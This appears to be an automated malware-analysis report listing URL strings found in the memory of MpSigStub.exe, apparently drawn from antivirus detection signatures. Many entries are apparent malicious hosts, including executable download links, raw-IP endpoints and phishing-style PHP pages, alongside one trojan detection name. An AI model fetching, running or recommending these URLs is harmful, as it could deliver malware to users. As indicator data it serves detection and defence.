Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.seonomad.com/1/play-mp3.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.shop-guide.co.kr/cs/help.php?type=sg_notice
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.sianm.com/MainDll/SoftSize.asp
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.sniperspy.com/guide.html
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.speedapps.com/adspace_bc_ref_1.htm
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.sqwire.com/
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://www.start-space.com/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.syncsoft.com.br/es/spyonepro/help/x
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://www.systweak.com/registrycleaner
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.szhaokan.cn/welcome.php?k=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://www.tattoopower.it/invoice-
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.thebestofnet.com/exit/
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.top-password.com/password-recovery-bundle.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.top-password.com/password-recovery-bundle.html~
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.turtlecoin.lol
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://www.update-srv.info
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://www.update-srv1.info
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://www.usaa.com/inet/
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://www.usatoday.com/search/results?q=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://www.v9.com/v9tb/
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://www.v9tr.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.videopacker.com/rdr/index.php
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://www.virtrigger.com
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://www.virtrigger.coma
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://www.wajam.com/webenhancer/logging
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://www.wajam.com/webenhancer/loggingxM
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.webtreats.info/__asf_script_command_ends_here__
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.win-spy.com/update
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.win-touch.com
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.windupdates.com
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://www.winferno.com/re/support.asp
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://www.wisefixer.com/
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://www.woothemes.com/flexslider/
Source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp String found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.wosss.com/search.aspx?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.wtsoftware.com.br/active/active.php?logon=wtsoftware&user=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.wtsoftware.com.br/loja/produtos.php?prog=msnspy
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.wtsoftware.com.br/produtos/msnspybox
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://www.xiuzhe.com/ddvan.exe
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://www.xpassgenerator.com/software/d
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.xupiter.com/d
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://www.xzwrn.cn/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.yessearches.com/?ts=
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.yontoo.com/PrivacyPolicy.aspx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.youndoo.com/?z=
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://wwwwww.f2kk.cn
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 0000000B.00000003.18313524013.0000021B5F166000.00000004.00000001.sdmp String found in binary or memory: http://xhuehs.cantvenlinea.ru:1942
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://xscanner.spyshredderscanner.com/a/install1597.cab
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://y31uv4ra1.vo.llnwd.net/js/advancedmactuneup/macpro/mcprinfo.ini
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://yourartmuseum.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://youssef-tawil.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://yupsearch.com
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://z1.nf-2.net/512.txt
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://zaxarstore2.com/download.php
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
Source: MpSigStub.exe, 0000000B.00000003.18305104252.0000021B5E24E000.00000004.00000001.sdmp String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp String found in binary or memory: https://agent.wizztrakys.com/a_
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://ajcbhjehkbf.25u.com/rom/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp String found in binary or memory: https://am.localstormwatch00.localstormwQj
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://aouscchakwal.000webhostapp.com/hot.phpmethod=
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://api.l33tsite.info/lib/
